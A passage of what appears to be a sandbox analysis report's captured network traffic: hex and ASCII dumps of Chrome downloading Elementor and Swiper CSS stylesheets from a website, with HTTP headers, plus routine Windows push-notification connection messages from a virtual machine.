                                                                                                                                                                                                                              Data Ascii: .swiper-slide,.swiper-3d .swiper-slide-shadow,.swiper-3d .swiper-slide-shadow-bottom,.swiper-3d .swiper-slide-shadow-left,.swiper-3d .swiper-slide-shadow-right,.swiper-3d .swiper-slide-shadow-top,.swiper-3d .swiper-wrapper{transform-style:preserve-3d}.swi
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC1369INData Raw: 72 61 70 70 65 72 7b 73 63 72 6f 6c 6c 2d 73 6e 61 70 2d 74 79 70 65 3a 79 20 6d 61 6e 64 61 74 6f 72 79 7d 2e 73 77 69 70 65 72 2d 63 65 6e 74 65 72 65 64 3e 2e 73 77 69 70 65 72 2d 77 72 61 70 70 65 72 3a 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 27 3b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 6f 72 64 65 72 3a 39 39 39 39 7d 2e 73 77 69 70 65 72 2d 63 65 6e 74 65 72 65 64 2e 73 77 69 70 65 72 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3e 2e 73 77 69 70 65 72 2d 77 72 61 70 70 65 72 3e 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 76 61 72 28 2d 2d 73 77 69 70 65 72 2d 63 65 6e 74 65 72 65 64 2d 6f 66 66 73 65 74 2d 62 65 66 6f 72 65 29 7d 2e 73 77 69 70 65 72 2d
                                                                                                                                                                                                                              Data Ascii: rapper{scroll-snap-type:y mandatory}.swiper-centered>.swiper-wrapper::before{content:'';flex-shrink:0;order:9999}.swiper-centered.swiper-horizontal>.swiper-wrapper>.swiper-slide:first-child{margin-inline-start:var(--swiper-centered-offset-before)}.swiper-
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC1369INData Raw: 69 70 65 72 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 73 69 7a 65 29 2f 20 32 29 29 3b 7a 2d 69 6e 64 65 78 3a 31 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 73 77 69 70 65 72 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 63 6f 6c 6f 72 2c 76 61 72 28 2d 2d 73 77 69 70 65 72 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 29 29 7d 2e 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 2d 6e 65 78 74 2e 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65 64 2c 2e 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 2d 70 72 65 76 2e 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 2d 64 69 73 61 62 6c 65
                                                                                                                                                                                                                              Data Ascii: iper-navigation-size)/ 2));z-index:10;cursor:pointer;display:flex;align-items:center;justify-content:center;color:var(--swiper-navigation-color,var(--swiper-theme-color))}.swiper-button-next.swiper-button-disabled,.swiper-button-prev.swiper-button-disable
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC1369INData Raw: 73 77 69 70 65 72 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3e 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 62 75 6c 6c 65 74 73 2c 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 62 75 6c 6c 65 74 73 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2c 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 63 75 73 74 6f 6d 2c 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 66 72 61 63 74 69 6f 6e 7b 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 62 75 6c 6c 65 74 73 2d 64 79 6e 61 6d 69 63 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 7d 2e 73 77 69 70 65 72
                                                                                                                                                                                                                              Data Ascii: swiper-horizontal>.swiper-pagination-bullets,.swiper-pagination-bullets.swiper-pagination-horizontal,.swiper-pagination-custom,.swiper-pagination-fraction{bottom:10px;left:0;width:100%}.swiper-pagination-bullets-dynamic{overflow:hidden;font-size:0}.swiper
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC1369INData Raw: 63 65 3a 6e 6f 6e 65 3b 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 63 6c 69 63 6b 61 62 6c 65 20 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 62 75 6c 6c 65 74 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 62 75 6c 6c 65 74 3a 6f 6e 6c 79 2d 63 68 69 6c 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 62 75 6c 6c 65 74 2d 61 63 74 69 76 65 7b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 62 75 6c 6c 65 74 2d 6f 70 61 63 69 74 79 2c 20 31 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 76 61 72 28 2d 2d
                                                                                                                                                                                                                              Data Ascii: ce:none;appearance:none}.swiper-pagination-clickable .swiper-pagination-bullet{cursor:pointer}.swiper-pagination-bullet:only-child{display:none!important}.swiper-pagination-bullet-active{opacity:var(--swiper-pagination-bullet-opacity, 1);background:var(--
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC1369INData Raw: 70 2c 34 70 78 29 7d 2e 73 77 69 70 65 72 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3e 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 62 75 6c 6c 65 74 73 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 62 75 6c 6c 65 74 73 2d 64 79 6e 61 6d 69 63 2c 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 62 75 6c 6c 65 74 73 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 62 75 6c 6c 65 74 73 2d 64 79 6e 61 6d 69 63 7b 6c 65 66 74 3a 35 30 25 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 35 30 25 29 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 73 77 69 70 65 72 2d 68 6f 72 69 7a 6f 6e 74 61 6c 3e 2e 73 77 69
                                                                                                                                                                                                                              Data Ascii: p,4px)}.swiper-horizontal>.swiper-pagination-bullets.swiper-pagination-bullets-dynamic,.swiper-pagination-horizontal.swiper-pagination-bullets.swiper-pagination-bullets-dynamic{left:50%;transform:translateX(-50%);white-space:nowrap}.swiper-horizontal>.swi
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC1369INData Raw: 72 69 7a 6f 6e 74 61 6c 3e 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 70 72 6f 67 72 65 73 73 62 61 72 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 70 72 6f 67 72 65 73 73 62 61 72 2d 6f 70 70 6f 73 69 74 65 2c 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 70 72 6f 67 72 65 73 73 62 61 72 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 70 72 6f 67 72 65 73 73 62 61 72 2d 6f 70 70 6f 73 69 74 65 2c 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 70 72 6f 67 72 65 73 73 62 61 72 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 76 65 72 74 69 63 61 6c 2c 2e 73 77 69 70 65 72 2d 76 65 72 74 69 63 61 6c 3e 2e 73
                                                                                                                                                                                                                              Data Ascii: rizontal>.swiper-pagination-progressbar.swiper-pagination-progressbar-opposite,.swiper-pagination-progressbar.swiper-pagination-horizontal.swiper-pagination-progressbar-opposite,.swiper-pagination-progressbar.swiper-pagination-vertical,.swiper-vertical>.s


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              46192.168.2.649773141.193.213.104431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:04 UTC596OUTGET /wp-content/plugins/elementor/assets/css/conditionals/e-swiper.min.css HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: style
                                                                                                                                                                                                                              Referer: https://www.tacinc.org/
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC478INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:04 GMT
                                                                                                                                                                                                                              Content-Type: text/css
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Tue, 15 Oct 2024 16:58:20 GMT
                                                                                                                                                                                                                              ETag: W/"670e9f2c-2814"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614816
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5c308f2e8f9-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC891INData Raw: 32 38 31 34 0d 0a 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6c 69 67 68 74 62 6f 78 7b 2d 2d 73 77 69 70 65 72 2d 74 68 65 6d 65 2d 63 6f 6c 6f 72 3a 23 30 30 30 3b 2d 2d 73 77 69 70 65 72 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 73 69 7a 65 3a 34 34 70 78 3b 2d 2d 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 62 75 6c 6c 65 74 2d 73 69 7a 65 3a 36 70 78 3b 2d 2d 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 62 75 6c 6c 65 74 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 67 61 70 3a 36 70 78 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 20 66 69 67 75 72 65 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65
                                                                                                                                                                                                                              Data Ascii: 2814.elementor-element,.elementor-lightbox{--swiper-theme-color:#000;--swiper-navigation-size:44px;--swiper-pagination-bullet-size:6px;--swiper-pagination-bullet-horizontal-gap:6px}.elementor-element .swiper-container .swiper-slide figure,.elementor-ele
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC1369INData Raw: 77 69 70 65 72 7e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6c 69 67 68 74 62 6f 78 20 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6c 69 67 68 74 62 6f 78 20 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 7e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6c 69 67 68 74 62 6f 78 20 2e 73 77 69 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6c 69 67 68 74 62 6f 78 20 2e 73 77 69 70 65 72 7e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 77 69 70 65 72
                                                                                                                                                                                                                              Data Ascii: wiper~.elementor-swiper-button,.elementor-lightbox .swiper-container .elementor-swiper-button,.elementor-lightbox .swiper-container~.elementor-swiper-button,.elementor-lightbox .swiper .elementor-swiper-button,.elementor-lightbox .swiper~.elementor-swiper
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC1369INData Raw: 2d 62 75 74 74 6f 6e 2d 70 72 65 76 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6c 69 67 68 74 62 6f 78 20 2e 73 77 69 70 65 72 7e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 2d 70 72 65 76 7b 6c 65 66 74 3a 31 30 70 78 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 2d 6e 65 78 74 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 7e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 2d 6e 65 78 74 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 2e 73 77 69 70 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 77
                                                                                                                                                                                                                              Data Ascii: -button-prev,.elementor-lightbox .swiper~.elementor-swiper-button-prev{left:10px}.elementor-element .swiper-container .elementor-swiper-button-next,.elementor-element .swiper-container~.elementor-swiper-button-next,.elementor-element .swiper .elementor-sw
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC1369INData Raw: 77 69 70 65 72 2d 69 6d 61 67 65 2d 73 74 72 65 74 63 68 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 2d 69 6d 61 67 65 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6c 69 67 68 74 62 6f 78 20 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 77 69 70 65 72 2d 69 6d 61 67 65 2d 73 74 72 65 74 63 68 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 2d 69 6d 61 67 65 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6c 69 67 68 74 62 6f 78 20 2e 73 77 69 70 65 72 20 2e 73 77 69 70 65 72 2d 69 6d 61 67 65 2d 73 74 72 65 74 63 68 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 20 2e 73 77 69 70 65 72 2d 73 6c 69 64 65 2d 69 6d 61 67 65 7b 77 69 64 74 68 3a 31 30 30 25 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65
                                                                                                                                                                                                                              Data Ascii: wiper-image-stretch .swiper-slide .swiper-slide-image,.elementor-lightbox .swiper-container .swiper-image-stretch .swiper-slide .swiper-slide-image,.elementor-lightbox .swiper .swiper-image-stretch .swiper-slide .swiper-slide-image{width:100%}.elementor-e
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC1369INData Raw: 74 73 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6c 69 67 68 74 62 6f 78 20 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 63 75 73 74 6f 6d 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6c 69 67 68 74 62 6f 78 20 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 66 72 61 63 74 69 6f 6e 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6c 69 67 68 74 62 6f 78 20 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 7e 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 62 75 6c 6c 65 74 73 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 68 6f 72 69 7a 6f 6e 74 61 6c
                                                                                                                                                                                                                              Data Ascii: ts.swiper-pagination-horizontal,.elementor-lightbox .swiper-container .swiper-pagination-custom,.elementor-lightbox .swiper-container .swiper-pagination-fraction,.elementor-lightbox .swiper-container~.swiper-pagination-bullets.swiper-pagination-horizontal
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC1369INData Raw: 20 2e 73 77 69 70 65 72 2e 73 77 69 70 65 72 2d 63 75 62 65 7e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 2d 35 30 25 2c 31 70 78 29 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 65 6c 65 6d 65 6e 74 20 3a 77 68 65 72 65 28 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 2d 68 6f 72 69 7a 6f 6e 74 61 6c 29 7e 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 62 75 6c 6c 65 74 73 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6c 69 67 68 74 62 6f 78 20 3a 77 68 65 72 65 28 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 2d 68 6f 72 69 7a 6f 6e 74 61 6c 29 7e 2e 73 77 69 70 65 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 62 75 6c 6c 65 74 73 7b 62 6f 74 74 6f 6d 3a 35
                                                                                                                                                                                                                              Data Ascii: .swiper.swiper-cube~.elementor-swiper-button{transform:translate3d(0,-50%,1px)}.elementor-element :where(.swiper-container-horizontal)~.swiper-pagination-bullets,.elementor-lightbox :where(.swiper-container-horizontal)~.swiper-pagination-bullets{bottom:5
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC1369INData Raw: 6c 65 6d 65 6e 74 2e 65 6c 65 6d 65 6e 74 6f 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 70 6f 73 69 74 69 6f 6e 2d 6f 75 74 73 69 64 65 20 2e 73 77 69 70 65 72 7e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6c 69 67 68 74 62 6f 78 2e 65 6c 65 6d 65 6e 74 6f 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 70 6f 73 69 74 69 6f 6e 2d 6f 75 74 73 69 64 65 20 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6c 69 67 68 74 62 6f 78 2e 65 6c 65 6d 65 6e 74 6f 72 2d 70 61 67 69 6e 61 74 69 6f 6e 2d 70 6f 73 69 74 69 6f 6e 2d 6f 75 74 73 69 64 65 20 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 7e
                                                                                                                                                                                                                              Data Ascii: lement.elementor-pagination-position-outside .swiper~.elementor-swiper-button,.elementor-lightbox.elementor-pagination-position-outside .swiper-container .elementor-swiper-button,.elementor-lightbox.elementor-pagination-position-outside .swiper-container~
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC1163INData Raw: 68 74 62 6f 78 2e 65 6c 65 6d 65 6e 74 6f 72 2d 61 72 72 6f 77 73 2d 70 6f 73 69 74 69 6f 6e 2d 6f 75 74 73 69 64 65 20 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 2d 70 72 65 76 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6c 69 67 68 74 62 6f 78 2e 65 6c 65 6d 65 6e 74 6f 72 2d 61 72 72 6f 77 73 2d 70 6f 73 69 74 69 6f 6e 2d 6f 75 74 73 69 64 65 20 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69 6e 65 72 7e 2e 65 6c 65 6d 65 6e 74 6f 72 2d 73 77 69 70 65 72 2d 62 75 74 74 6f 6e 2d 70 72 65 76 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6c 69 67 68 74 62 6f 78 2e 65 6c 65 6d 65 6e 74 6f 72 2d 61 72 72 6f 77 73 2d 70 6f 73 69 74 69 6f 6e 2d 6f 75 74 73 69 64 65 20 2e 73 77 69 70 65 72 20 2e 65 6c
                                                                                                                                                                                                                              Data Ascii: htbox.elementor-arrows-position-outside .swiper-container .elementor-swiper-button-prev,.elementor-lightbox.elementor-arrows-position-outside .swiper-container~.elementor-swiper-button-prev,.elementor-lightbox.elementor-arrows-position-outside .swiper .el
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                              47192.168.2.64977140.113.103.199443
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 62 38 62 5a 54 79 74 39 72 6b 2b 65 64 41 6a 45 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 31 32 36 30 39 63 35 61 65 37 34 37 62 65 36 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: CNT 1 CON 305MS-CV: b8bZTyt9rk+edAjE.1Context: 712609c5ae747be6
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 62 38 62 5a 54 79 74 39 72 6b 2b 65 64 41 6a 45 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 31 32 36 30 39 63 35 61 65 37 34 37 62 65 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 63 4f 73 36 63 53 6b 65 30 55 48 52 73 55 68 77 41 50 46 62 57 6e 61 64 46 4d 56 41 6d 6e 64 57 46 68 48 46 63 6b 38 37 4b 44 72 6c 39 58 47 7a 55 51 51 6b 46 59 6b 47 2f 4e 6b 31 79 48 4d 34 72 67 44 57 51 31 6a 50 57 43 4f 41 59 63 72 71 7a 57 6c 52 54 56 5a 49 75 39 37 49 72 31 61 6c 45 46 6c 2f 6d 6e 58 69 67 38 57 55 66
                                                                                                                                                                                                                              Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: b8bZTyt9rk+edAjE.2Context: 712609c5ae747be6<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAcOs6cSke0UHRsUhwAPFbWnadFMVAmndWFhHFck87KDrl9XGzUQQkFYkG/Nk1yHM4rgDWQ1jPWCOAYcrqzWlRTVZIu97Ir1alEFl/mnXig8WUf
                                                                                                                                                                                                                              2024-10-23 18:04:05 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 62 38 62 5a 54 79 74 39 72 6b 2b 65 64 41 6a 45 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 31 32 36 30 39 63 35 61 65 37 34 37 62 65 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
